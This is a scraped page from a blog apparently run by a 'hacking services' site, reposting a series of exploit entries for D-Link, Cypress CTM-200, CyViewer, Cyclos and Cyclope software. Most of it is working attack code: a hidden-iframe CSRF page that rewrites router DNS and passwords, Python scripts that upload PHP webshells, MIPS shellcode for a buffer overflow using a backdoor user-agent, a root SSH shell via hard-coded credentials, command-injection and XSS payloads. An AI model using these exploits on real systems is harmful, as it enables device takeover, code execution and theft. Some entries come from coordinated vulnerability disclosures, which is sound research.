Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863149596

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/51985/info

D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.

D-Link DAP-1150 firmware version 1.2.94 is vulnerable; other versions may also be affected. 

<html>
<head>
<title>Exploit for D-Link DAP 1150. Made by MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=3;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute(&#039;name&#039;, &#039;csrf&#039;+i);
ifr.setAttribute(&#039;width&#039;, &#039;0&#039;);
ifr.setAttribute(&#039;height&#039;, &#039;0&#039;);
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
setTimeout(CSRF3,2000);
}
function CSRF1() {
window.frames["csrf3"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_json" value="y">\n<input type="hidden"
name="res_data_type" value="json">\n<input type="hidden"
name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size"
value="0">\n<input type="hidden" name="res_buf"
value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>&#039;;
window.frames["csrf3"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf4"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="res_cmd" value="20">\n<input type="hidden" name="res_buf"
value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input
type="hidden" name="v2" value="y">\n<input type="hidden" name="rq"
value="y">\n</form>&#039;;
window.frames["csrf4"].document.hack.submit();
}
function CSRF3() {
window.frames["csrf2"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="69">\n<input type="hidden"
name="res_struct_size" value="1">\n<input type="hidden" name="res_buf"
value="password|">\n</form>&#039;;
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>
HireHackking 
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

D-Link Central WiFiManager Software Controller Multiple Vulnerabilities

1. *Advisory Information*

Title: D-Link Central WiFiManager Software Controller Multiple
Vulnerabilities
Advisory ID: CORE-2018-0010
Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
Date published: 2018-10-04
Date of last update: 2018-10-04
Vendors contacted: D-Link
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Unrestricted Upload of File with Dangerous Type [CWE-434],
Improper Authorization [CWE-285], Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441

3. *Vulnerability Description*

D-Link's website states that:

[1] Central WiFiManager Software Controller helps network administrators
streamline their wireless access point (AP) management workflow. Central
WiFiManager is an innovative approach to the more traditional
hardware-based multiple access point management system. It uses a
centralized server to both remotely manage and monitor wireless APs on a
network.

Vulnerabilities were found in the Central WiFiManager Software
Controller, allowing unauthenticated and authenticated file upload with
dangerous type that could lead to remote code execution with system
permissions. Also, two stored Cross Site Scripting vulnerabilities were
found.

4. *Vulnerable Packages*

    . Central WifiManager v1.03

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

D-Link released the following Beta version that addresses the reported vulnerabilities:

    . Central WifiManager v 1.03r0100-Beta1

In addition, D-Link published a security note in:
https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092

6. *Credits*

These vulnerabilities were discovered and researched by Julian Muñoz
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

D-Link Central WiFiManager Software Controller exposes an FTP server
that serves by default in port 9000 and has hardcoded credentials
(admin, admin). Taking advantage of this fact, we will upload a PHP file
in the '/web/public' directory and then, by requesting this file, will
be able to execute arbitrary code on the target system (shown in 7.1).

On 7.2 we show a similar attack to but in this case with an
authenticated user in the web application. The application has a
functionality to upload a .rar file used for the captive portal
displayed by the Access Points. We will craft a .rar with a PHP file
that we will end up executing in the context of the web application.
When the .rar is uploaded is stored in the path "\web\captivalportal" in
a folder with a timestamp created by the PHP time() function. In order
to know what is the web server's time we request an information file
that contains the time we are looking for. After we have the server's
time we upload the .rar, calculate the proper epoch and request the
appropriate path increasing this epoch by one until we hit the correct
one.

Finally, we discovered two Cross-Site Scripting, one on the update site
functionality, in the 'sitename' parameter (7.3) and the other one on
the creation of a local user in the 'username' parameter (7.4).

7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of
File with Dangerous Type*

[CVE-2018-17440] The web application starts an FTP server running on the
port 9000 by default with admin/admin credentials and do not show the
option to change it, so in this POC we establish a connection with the
server and upload a PHP file. Since the application do not restrict
unauthenticated users to request any file in the web root, we later
request the uploaded file to achieve remote code execution.

/-----
import requests
from ftplib import FTP

#stablish connection with FTP server
host_ip = "127.0.0.1"
ftp = FTP()
ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000)
ftp.login(<ftp://ftp.login(>"admin", "admin")
data = []

#create PHP poc file
poc_php_file = open("poc.php", "w+")
poc_php_file.write("<?php\nsystem('whoami');\n?>")
poc_php_file.close()

#upload PHP poc file
php_file = open("poc.php", "rb")
ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')>
ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file)
ftp.dir(data.append)<ftp://ftp.dir(data.append)>
ftp.quit()<ftp://ftp.quit()>

for line in data:
  print "-", line

session = requests.Session()
session.trust_env = False

#get the uploaded file for remote code execution
get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)

print get_uploaded_file.text
-----/

7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*

[CVE-2018-17442] In this case we make a file upload using the
functionality given by the onUploadLogPic endpoint, that will take a
.rar file, decompress it and store it in a folder named after the PHP
time() function. Our goal is first obtain the server's time, upload a
.rar with our PHP file, calculate the proper epoch and iterate
increasing it until we hit the proper one and remote code execution is
achieved.

/-----
import re
import time
import requests
import datetime
import tarfile

def parse_to_datetime(date_string):
    date_list = date_string.split("-")
    td = date_list[2][2:].split(":")
    return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))

session = requests.Session()
session.trust_env = False
php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id)
cookie = {'PHPSESSID': php_session_id}

#create tar file to upload.
poc_php_file = open("poc.php", "w+")
poc_php_file.write("<?php\nsystem('whoami');\n?>")
poc_php_file.close()

poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w")
poc_tar_file.add("poc.php")
poc_tar_file.close()

#get server datetime.
get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT',
                                                  cookies=cookie, verify=False)
date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')
#generate epoch from server's date
epoch = int(time.mktime(parse_to_datetime(date).timetuple()))

#upload attack PHP file.
attack_tar_file = "poc_tar_file.tar"
tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')}
restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic',
                                       files=tar_file,
                                       cookies=cookie, verify=False)

for i in range(0,20):
    #get the uploaded file named after time epoch, returned by PHP time() function.
    filename = str(epoch) + "/" + "poc.php"
    get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False)
    if get_uploaded_file.status_code == 200:
        print "Remote Code Execution Achived"
        print get_uploaded_file.text
        break
    epoch += 1
-----/

7.3. *Cross-Site Scripting in the application site name parameter*

[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is
vulnerable to a stored Cross Site Scripting:

The following is a proof of concept to demonstrate the vulnerability:

/-----
POST /index.php/Config/UpdateSite HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/Config/CreatSite
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1
-----/

7.4. *Cross-Site Scripting in the creation of a new user*

[CVE-2018-17441] The 'username' parameter of the addUser endpoint is
vulnerable to a stored Cross Site Scripting.

The following is a proof of concept to demonstrate the vulnerability:

/-----
POST /index.php/System/addUser HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/System/userManager
Content-Type: application/x-www-form-urlencoded;
Content-Length: 96
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close

username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
-----/

8. *Report Timeline*

2018-06-04: Core Security sent an initial notification to D-Link,
including a draft advisory.
2018-06-06:D-Link confirmed the reception of the advisory and informed
they will have an initial response on 06/08.
2018-06-08: D-Link informed that they would provide a schedule for the
fixes on 06/13.
2018-06-08: Core Security thanked the update.
2018-06-14: D-Link informed its plan of remediation and notified Core
Security that the fixed version will be available on 08/31.
2018-06-15: Core Security thanked the update and proposed to keep in
regular contact until this tentative release date.
2018-07-23: Core Security requested a status update.
2018-07-25: D-Link answered saying that they are still targeting 08/31
as the release date.
2018-08-24: Core Security requested a new status update and a solidified
release date for the fixed version.
2018-08-28: D-Link sent a beta version for test.
2018-08-30: Core Security tested the beta version and requested D-Link
to coordinate a release date.
2018-09-21: D-Link informed that they were planning a security
announcement and they were ready to schedule a disclosure date.
2018-09-24: Core Security thanked the update and proposed October 4th as
the publication date.
2018-10-04: Advisory CORE-2018-0010 published.

9. *References*

[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/.

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com<mailto:info@coresecurity.com>

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
HireHackking 
# Exploit Title: D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
# Author: John Page (aka hyp3rlinx)
# Date: 2018-11-09
# Vendor: http://us.dlink.com
# Product Link: http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/
# Version: Version 1.03 r0098
# CVE: N/A
# References:

# [Security Issue]
# Using a web browser or script SSRF can be initiated against internal/external systems 
# to conduct port scans by leveraging D-LINKs MailConnect component.

# The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended 
# to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, 
# leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
# This can undermine accountability of where scan or connections actually came from and or bypass 
# the FW etc. This can be automated via script or using Web Browser.

# [Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/

reply: OK

#Scan internal port 22 SSH:

https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK
HireHackking 
source: https://www.securityfocus.com/bid/63234/info

Multiple Vendors are prone to a stack-based buffer-overflow vulnerability.

Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices.

The following are vulnerable:

D-Link DIR-120
D-Link DI-624S
D-Link DI-524UP
D-Link DI-604S
D-Link DI-604UP
D-Link DI-604
D-Link DIR-100
D-Link TM-G5240
PLANEX COMMUNICATIONS BRL-04UR
PLANEX COMMUNICATIONS BRL-04R
PLANEX COMMUNICATIONS BRL-04CW 

import sys
import urllib2

try:
	url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
except Exception, e:
	print str(e)
	print 'Usage: %s <target ip>' % sys.argv[0]
	sys.exit(1)

# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
payload  = "\x3c\x06\x43\x21" # lui     a2,0x4321
payload += "\x34\xc6\xfe\xdc" # ori     a2,a2,0xfedc
payload += "\x3c\x05\x28\x12" # lui     a1,0x2812
payload += "\x34\xa5\x19\x69" # ori     a1,a1,0x1969
payload += "\x3c\x04\xfe\xe1" # lui     a0,0xfee1
payload += "\x34\x84\xde\xad" # ori     a0,a0,0xdead
payload += "\x24\x02\x0f\xf8" # li      v0,4088
payload += "\x01\x01\x01\x0c" # syscall 0x40404

# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $fp or $t9 registers.
move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
jump_code =  "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
jump_code += "\x03\x21\xf8\x08" # jr $t9
jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102

# Stitch together the payload chunk(s) and jump_code snippet
shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
if len(shellcode_p1) < 86:
	shellcode_p1 += "D" * (86 - len(shellcode_p1))
	shellcode_p2 = ""
else:
	shellcode_p2 = "DD" + payload[68:]

# Build the overflow buffer, with the return address and shellcode
# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
# libc_base = 0x2aaee000
# ret_offset = 0x3243C
buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2

# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
urllib2.urlopen(req)
HireHackking 
# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
#                   CTM-ONE (1.3.1)
#                   CTM-ONE (1.1.9)
#                   CTM200 (2.7.1.5659-latest)
#                   CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
# 
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
#            GNU/Linux 2.6.32.25 (arm4tl)
#            lighttpd/1.4.39
#            BusyBox v1.24.1
#            BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#

import sys
import paramiko

bnr='''
o ┌─┐┌┬┐┌─┐  ┌─┐  ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬  ┬   o
  │ │││││ ┬  ├─┤  ├┬┘│ ││ │ │ └─┐├─┤├┤ │  │
o └─┘┴ ┴└─┘  ┴ ┴  ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''
print(bnr)

if len(sys.argv)<2:
    print('Put an IP.')
    sys.exit()

adrs=sys.argv[1]##
unme='root'#admin#
pwrd='Chameleon'##

rsh=paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)

while 1:
    cmnd=input('# ')
    if cmnd=='exit':
        break
    stdin,stdout,stderr=rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))
rsh.close()
HireHackking 
# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection


Vendor: Cypress Solutions Inc.
Product web page: https://www.cypress.bc.ca
Affected version: 2.7.1.5659
                  2.0.5.3356-184

Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.
The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.
Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site
office and SCADA communications.

Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user
through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd
upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to
the wget command in /usr/bin/cmdmain ELF binary.

================================================================================================
/www/cgi-bin/webif/ctm-config-upgrade.sh:
-----------------------------------------

136:    if ! empty "$FORM_install_fw_url"; then
137:         echo "</pre>"
138:       echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
139:                 cmd upgradefw "$FORM_fw_url"
140:                 unset FORM_install_fw_url FORM_submit
141:                 echo "</pre><br />Done."
142:    fi
==================================================================
cmdmain (ELF):

    memset(&DAT_0003bd1c,0,0x80);
    make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
    sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
    ctmsys(local_184);
    sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
    iVar3 = ctm_fopen(local_184,"r");
    if (iVar3 == 0) {
      uVar5 = *(undefined4 *)(iParm2 + 8);
      __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
      goto LAB_0001f4a8;
    }
    ctm_fclose();
    memset(local_184,0,0x100);
    sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
    ctmsys(local_184);
=================================================================
cmd (ELF):

              while (sVar1 = strlen(__s2), uVar7 < sVar1) {
                __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
                __s2 = *ppcVar8;
                uVar7 = uVar7 + 1;
              }
              uStack180 = 0x7273752f;
              uStack176 = 0x6e69622f;
              uStack172 = 0x646d632f;
              uStack168 = 0x6d632f73;
              uStack164 = 0x69616d64;
              uStack160 = 0x6e;
              uStack159 = 0;
              iVar2 = execv((char *)&uStack180,ppcParm2);
================================================================================================

Tested on: GNU/Linux 2.6.32.25 (arm4tl)
           BusyBox v1.15.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5687
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php


21.09.2021

--


PoC POST request:
-----------------

POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1

------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="fw_url"

`id`
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="install_fw_url"

Start Firmware Upgrade from URL
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="pkgurl"


------WebKitFormBoundaryZlABvwQnpLtpe9mM--



Response:
---------

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http: //www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http: //www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...
...
Firmware Management

Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image:
extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed
OK

Done.
...
...
</div>
<br />
<fieldset id="save">
    <legend><strong>Proceed Changes</strong></legend>
    <div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
    <ul class="apply">
        <li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >&raquo; Save Configuration &laquo;</a></li>
    </ul>
</fieldset>
</form>
<hr />
<div id="footer">
    <h3>X-Wrt</h3>
    <em>End user extensions for OpenWrt</em>
</div>
</div> <!-- End #container -->
</body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/48483/info

CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.

Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges. 

<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub

</script>
</html>
HireHackking 
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Date: 18/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674

# Description: 
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.

# Steps to reproduce: 
An attacker sends a draft URL

[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.

When a victim opens the URL, XSS will be triggered.
HireHackking 
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Date: 17/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673

# Description: 
A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.

# Steps to reproduce: 
An attacker sends a draft URL

[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.

When a victim opens the URL, XSS will be triggered.
HireHackking 
# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution (again)
# Version: <= 6.8.1 
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html
# Link: http://www.cyclope-series.com/setups/setup.exe
 
# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform 
# and equip management with statistics relating to the productivity of staff within their organization. 
 
# Vulnerability:
# Due to insecure file Permissions, a low privileged could potentially 
# delete, modify or replace many of the key executable files used, and needed
# by the software.

# Although I haven't checked older versions, I do recall seeing the same file
# permissions being set. Making this software extremely prone to lots of fun stuff.

''' File Information '''
A few files with odd-ball permission. Keep in mind all files are like this.
All files in c:\xampplite, as well as  in Program Files.
The "CyclopeClient.exe" is is what is pushed to workstation in order to monitor
employees. As we can see, this file's permission is set to "Everybody". So is the
uninstaller executable.

So gain access to the system, and as a low privileged user one can
easily replace httpd.exe or mysqld.exe, with an evil EXE file.
Next time that file is executed, you'll get your shell as SYSTEM.
Although they'll be out of a service...bummer


# C:\xampplite\mysql\bin>icacls mysqld.exe
# mysqld.exe BUILTIN\Administrators:(I)(F)
#            NT AUTHORITY\SYSTEM:(I)(F)
#            BUILTIN\Users:(I)(RX)
#            NT AUTHORITY\Authenticated Users:(I)(M)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\xampplite\apache\bin>icacls httpd.exe
# httpd.exe BUILTIN\Administrators:(I)(F)
#           NT AUTHORITY\SYSTEM:(I)(F)
#           BUILTIN\Users:(I)(RX)
#           NT AUTHORITY\Authenticated Users:(I)(M)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\xampplite\mysql\bin>icacls mysql.exe
# mysql.exe BUILTIN\Administrators:(I)(F)
